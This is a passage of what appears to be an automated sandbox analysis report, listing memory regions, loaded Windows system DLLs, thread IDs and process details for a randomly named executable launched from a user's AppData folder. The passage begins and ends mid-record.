region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 1157 start_va = 0x12d0000 end_va = 0x130ffff entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 1158 start_va = 0x1360000 end_va = 0x139ffff entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 1159 start_va = 0x13b0000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 1160 start_va = 0x13f0000 end_va = 0x142ffff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 1161 start_va = 0x1430000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 1162 start_va = 0x1530000 end_va = 0x15effff entry_point = 0x1530000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1163 start_va = 0x16c0000 end_va = 0x16cffff entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 1164 start_va = 0x16e0000 end_va = 0x171ffff entry_point = 0x0 region_type = private name = "private_0x00000000016e0000" filename = "" Region: id = 1165 start_va = 0x1830000 end_va = 0x186ffff entry_point = 0x0 region_type = private name = "private_0x0000000001830000" filename = "" Region: id = 1166 start_va = 0x19e0000 end_va = 0x1a1ffff entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 1167 start_va = 0x6e660000 end_va = 0x6e667fff entry_point = 0x6e662ca6 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1168 start_va = 0x6e6a0000 end_va = 0x6e6acfff entry_point = 0x6e6a0000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 1169 start_va = 0x6e6b0000 end_va = 0x6e6b2fff entry_point = 0x6e6b0000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 1170 start_va = 0x6e6c0000 end_va = 0x6e74ffff entry_point = 0x6e6c0000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 1171 start_va = 0x6ea80000 end_va = 0x6ea91fff entry_point = 0x6ea80000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 1172 start_va = 0x6ee20000 end_va = 0x6ee80fff entry_point = 0x6ee20000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1173 start_va = 0x6f800000 end_va = 0x6f805fff entry_point = 0x6f8014b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1174 start_va = 0x6f880000 end_va = 0x6f8d9fff entry_point = 0x6f881f35 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1175 start_va = 0x71510000 end_va = 0x7155bfff entry_point = 0x71512c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1176 start_va = 0x719c0000 end_va = 0x71a0efff entry_point = 0x719c1452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1177 start_va = 0x71a10000 end_va = 0x71a67fff entry_point = 0x71a113b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1178 start_va = 0x71c80000 end_va = 0x71c94fff entry_point = 0x71c80000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 1179 start_va = 0x71ea0000 end_va = 0x71eb1fff entry_point = 0x71ea0000 region_type = mapped_file name = "vmictimeprovider.dll" filename = "\\Windows\\System32\\vmictimeprovider.dll" (normalized: "c:\\windows\\system32\\vmictimeprovider.dll") Region: id = 1180 start_va = 0x71ed0000 end_va = 0x71f19fff entry_point = 0x71ed0000 region_type = mapped_file name = "w32time.dll" filename = "\\Windows\\System32\\w32time.dll" (normalized: "c:\\windows\\system32\\w32time.dll") Region: id = 1181 start_va = 0x735a0000 end_va = 0x735a7fff entry_point = 0x735a131e region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 1182 start_va = 0x735b0000 end_va = 0x735c1fff entry_point = 0x735b18f2 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 1183 start_va = 0x735d0000 end_va = 0x735dffff entry_point = 0x735d1526 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 1184 start_va = 0x736e0000 end_va = 0x736f2fff entry_point = 0x736e1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1185 start_va = 0x73f80000 end_va = 0x73f91fff entry_point = 0x73f83271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1186 start_va = 0x73fa0000 end_va = 0x73fd7fff entry_point = 0x73fa990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1187 start_va = 0x73ff0000 end_va = 0x73ffcfff entry_point = 0x73ff2012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1188 start_va = 0x740c0000 end_va = 0x740c7fff entry_point = 0x740c0000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 1189 start_va = 0x740e0000 end_va = 0x740e6fff entry_point = 0x740e128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1190 start_va = 0x740f0000 end_va = 0x7410bfff entry_point = 0x740fa431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1191 start_va = 0x74130000 end_va = 0x74176fff entry_point = 0x741489f9 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1192 start_va = 0x741a0000 end_va = 0x741a8fff entry_point = 0x741a0000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1193 start_va = 0x747f0000 end_va = 0x747fffff entry_point = 0x747f38c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1194 start_va = 0x74940000 end_va = 0x74948fff entry_point = 0x74941220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1195 start_va = 0x749d0000 end_va = 0x749d4fff entry_point = 0x749d15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1196 start_va = 0x74a70000 end_va = 0x74a85fff entry_point = 0x74a70000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1197 start_va = 0x74af0000 end_va = 0x74b06fff entry_point = 0x74af1c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1198 start_va = 0x74c20000 end_va = 0x74c5afff entry_point = 0x74c2128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1199 start_va = 0x74cd0000 end_va = 0x74cf1fff entry_point = 0x74cd0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1200 start_va = 0x74d00000 end_va = 0x74d43fff entry_point = 0x74d163f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1201 start_va = 0x74e30000 end_va = 0x74e6bfff entry_point = 0x74e3145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1202 start_va = 0x74e70000 end_va = 0x74e85fff entry_point = 0x74e72dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1203 start_va = 0x74f70000 end_va = 0x74f77fff entry_point = 0x74f734d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1204 start_va = 0x750b0000 end_va = 0x750c0fff entry_point = 0x750b0000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 1205 start_va = 0x75270000 end_va = 0x75275fff entry_point = 0x75271673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1206 start_va = 0x75300000 end_va = 0x75307fff entry_point = 0x753010e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1207 start_va = 0x75320000 end_va = 0x7533afff entry_point = 0x753293b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1208 start_va = 0x75340000 end_va = 0x7534bfff entry_point = 0x753410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1209 start_va = 0x75350000 end_va = 0x753aefff entry_point = 0x75352134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1210 start_va = 0x753e0000 end_va = 0x753edfff entry_point = 0x753e1235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1211 start_va = 0x753f0000 end_va = 0x753fafff entry_point = 0x753f1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1212 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1213 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1214 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1215 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1216 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1217 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1218 start_va = 0x766f0000 end_va = 0x76772fff entry_point = 0x766f23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1219 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1220 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1221 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1222 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1223 start_va = 0x76960000 end_va = 0x76994fff entry_point = 0x7696145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1224 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b59ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1225 start_va = 0x76ba0000 end_va = 0x76c2efff entry_point = 0x76ba3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1226 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1227 start_va = 0x77140000 end_va = 0x7729bfff entry_point = 0x7718ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1228 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1229 start_va = 0x773e0000 end_va = 0x773e5fff entry_point = 0x773e1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1230 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1231 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1232 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1233 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 1234 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 1235 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 1236 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 1237 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 1238 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 1239 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1240 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 1241 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 1242 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1243 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1244 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1245 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1246 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1247 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1248 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1249 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 43 os_tid = 0x704 Thread: id = 44 os_tid = 0x734 Thread: id = 45 os_tid = 0x7f0 Thread: id = 46 os_tid = 0x7ec Thread: id = 47 os_tid = 0x7e0 Thread: id = 48 os_tid = 0x7d8 Thread: id = 49 os_tid = 0x7d0 Thread: id = 50 os_tid = 0x74c Thread: id = 51 os_tid = 0x748 Thread: id = 52 os_tid = 0x5f0 Thread: id = 53 os_tid = 0x5d8 Thread: id = 54 os_tid = 0x40c Thread: id = 55 os_tid = 0x408 Thread: id = 56 os_tid = 0x3f8 Thread: id = 57 os_tid = 0x3e4 Thread: id = 58 os_tid = 0xb30 Thread: id = 63 os_tid = 0xbac Thread: id = 102 os_tid = 0xe04 Process: id = "8" image_name = "ekgeobhbhtp7rxmh.exe" filename = "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe" page_root = "0x7eef7360" os_pid = "0xbdc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xb04" cmd_line = "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe\"" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1258 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1259 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1260 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1261 start_va = 0xc40000 end_va = 0xc5afff entry_point = 0xc40000 region_type = mapped_file name = "ekgeobhbhtp7rxmh.exe" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe") Region: id = 1262 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1263 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1264 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1265 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 1266 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1267 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1268 start_va = 0x40000 end_va = 0xa6fff entry_point = 0x40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1269 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1270 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 1271 start_va = 0x6eb50000 end_va = 0x6ebd3fff entry_point = 0x6eb519a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1272 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1273 start_va = 0x754c0000 end_va = 0x754e6fff entry_point = 0x754c58b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1274 start_va = 0x756d0000 end_va = 0x756e1fff entry_point = 0x756d1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1275 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1276 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1277 start_va = 0x758a0000 end_va = 0x764e9fff entry_point = 0x75921601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1278 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1279 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1280 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1281 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1282 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1283 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1284 start_va = 0x769a0000 end_va = 0x76b3cfff entry_point = 0x769a17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1285 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b59ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1286 start_va = 0x76ba0000 end_va = 0x76c2efff entry_point = 0x76ba3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1287 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1288 start_va = 0x77140000 end_va = 0x7729bfff entry_point = 0x7718ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1289 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1290 start_va = 0xe0000 end_va = 0x1a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1291 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1292 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1293 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1294 start_va = 0xb0000 end_va = 0xb0fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 1295 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1296 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1297 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 1298 start_va = 0x5c0000 end_va = 0x9b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1299 start_va = 0xb90000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 1300 start_va = 0xc60000 end_va = 0x185ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 1301 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1302 start_va = 0x1860000 end_va = 0x1b2efff entry_point = 0x1860000 region_type = mapped_file name = 